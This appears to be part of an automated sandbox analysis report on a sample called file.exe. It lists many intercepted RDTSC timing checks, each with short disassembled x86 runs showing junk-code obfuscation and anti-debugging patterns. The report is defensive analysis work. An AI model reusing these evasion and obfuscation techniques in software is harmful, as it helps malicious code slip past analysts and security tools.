                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941122 second address: 941189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F228D5156C8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 cmc 0x00000024 push 00000000h 0x00000026 jo 00007F228D5156CCh 0x0000002c add dword ptr [ebp+1245AFC3h], edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F228D5156C8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov di, 4A37h 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941189 second address: 94118E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942189 second address: 94218D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94218D second address: 942197 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942197 second address: 94219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94219B second address: 94221D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F228CBCA0B5h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 jmp 00007F228CBCA0B0h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F228CBCA0A8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 clc 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D1C4Ah] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F228CBCA0A8h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov bx, di 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94221D second address: 942222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942222 second address: 94222C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9401D9 second address: 9401DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9401DD second address: 9401E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9401E3 second address: 9401E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942368 second address: 942396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F228CBCA0B4h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9441AC second address: 9441B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943291 second address: 943297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9441B0 second address: 944227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F228D5156C8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push edx 0x00000027 jg 00007F228D5156CCh 0x0000002d pop edi 0x0000002e or edi, 02BD7EBDh 0x00000034 cld 0x00000035 push 00000000h 0x00000037 mov di, si 0x0000003a push 00000000h 0x0000003c mov ebx, dword ptr [ebp+122D2A9Ch] 0x00000042 xchg eax, esi 0x00000043 ja 00007F228D5156CEh 0x00000049 push eax 0x0000004a jbe 00007F228D5156E5h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944227 second address: 94422B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943297 second address: 94332E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F228D5156C8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov bx, ax 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov dword ptr [ebp+122D242Ch], edi 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov dword ptr [ebp+12469263h], ecx 0x00000043 mov eax, dword ptr [ebp+122D0D0Dh] 0x00000049 jmp 00007F228D5156D7h 0x0000004e push FFFFFFFFh 0x00000050 sbb edi, 06E8A262h 0x00000056 or dword ptr [ebp+122D190Ch], edx 0x0000005c nop 0x0000005d jmp 00007F228D5156CDh 0x00000062 push eax 0x00000063 pushad 0x00000064 push ecx 0x00000065 jnp 00007F228D5156C6h 0x0000006b pop ecx 0x0000006c push eax 0x0000006d push edx 0x0000006e push esi 0x0000006f pop esi 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945260 second address: 945302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F228CBCA0A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jmp 00007F228CBCA0B6h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F228CBCA0A8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D27E3h], esi 0x0000004b push 00000000h 0x0000004d sub di, 60ACh 0x00000052 xchg eax, esi 0x00000053 jmp 00007F228CBCA0B3h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jng 00007F228CBCA0A8h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944406 second address: 94440A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945302 second address: 945310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228CBCA0AAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94440A second address: 944410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944410 second address: 94441A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948922 second address: 94893B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228D5156D5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94893B second address: 9489BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F228CBCA0A8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 jmp 00007F228CBCA0B6h 0x0000002b push 00000000h 0x0000002d jg 00007F228CBCA0ACh 0x00000033 push 00000000h 0x00000035 jng 00007F228CBCA0B8h 0x0000003b jmp 00007F228CBCA0B2h 0x00000040 push eax 0x00000041 pushad 0x00000042 push edi 0x00000043 pushad 0x00000044 popad 0x00000045 pop edi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9489BC second address: 9489C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952FBC second address: 952FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228CBCA0B2h 0x00000009 jne 00007F228CBCA0A6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957324 second address: 95733B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F228D5156C6h 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F228D5156C6h 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959CBE second address: 959CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED03A second address: 8ED03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DDFF second address: 95DE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F228CBCA0ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DF2F second address: 95DF63 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F228D5156C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F228D5156EAh 0x00000010 jmp 00007F228D5156CCh 0x00000015 jmp 00007F228D5156D8h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DF63 second address: 95DF68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E0E0 second address: 95E0EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156CAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E0EE second address: 95E0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E0F8 second address: 95E112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228D5156D6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E112 second address: 95E130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E130 second address: 95E134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E5A2 second address: 95E5A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E832 second address: 95E838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E838 second address: 95E83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E83C second address: 95E84D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F228D5156C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E84D second address: 95E852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E852 second address: 95E86A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F228D5156D2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E86A second address: 95E87E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0B0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9630A3 second address: 9630B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F228D5156C8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9630B0 second address: 9630B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961F66 second address: 961F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961F6C second address: 961F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B0h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CCB6 second address: 92CCC0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F228D5156C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CCC0 second address: 92CCCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CD91 second address: 92CD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CF65 second address: 92CFAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F228CBCA0A8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 pushad 0x00000027 mov dx, C026h 0x0000002b clc 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CFAF second address: 92CFB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92CFB3 second address: 92CFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D5D9 second address: 92D5E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D9E8 second address: 92D9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D9EC second address: 92DA07 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F228D5156D3h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DA07 second address: 92DA1D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F228CBCA0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007F228CBCA0B4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DA1D second address: 911FB2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F228D5156C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jnl 00007F228D5156D1h 0x00000011 call dword ptr [ebp+12449738h] 0x00000017 push ecx 0x00000018 jmp 00007F228D5156D3h 0x0000001d pop ecx 0x0000001e push ecx 0x0000001f jno 00007F228D5156D2h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 911FB2 second address: 911FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96222E second address: 962253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jnc 00007F228D5156C6h 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9623D8 second address: 9623E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9623E2 second address: 9623E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9623E8 second address: 9623EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9623EE second address: 96240B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96240B second address: 962429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0ABh 0x00000009 popad 0x0000000a jnc 00007F228CBCA0AEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962429 second address: 962446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228D5156D7h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962446 second address: 96244A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96244A second address: 962450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962450 second address: 96245A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96245A second address: 96245E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962B4A second address: 962B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9694D5 second address: 9694E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F228D5156C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F06B6 second address: 8F06BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F06BC second address: 8F06CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228D5156CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F06CD second address: 8F06ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228CBCA0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9681DE second address: 9681EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F228D5156CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9681EF second address: 96821D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F228CBCA0B4h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F228CBCA0B0h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96821D second address: 968223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968223 second address: 968227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968388 second address: 968393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F228D5156C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968393 second address: 968399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968399 second address: 9683A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9683A4 second address: 9683A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9683A8 second address: 9683C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F228D5156D6h 0x0000000e pushad 0x0000000f js 00007F228D5156C6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968C0C second address: 968C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968C11 second address: 968C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 968C17 second address: 968C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
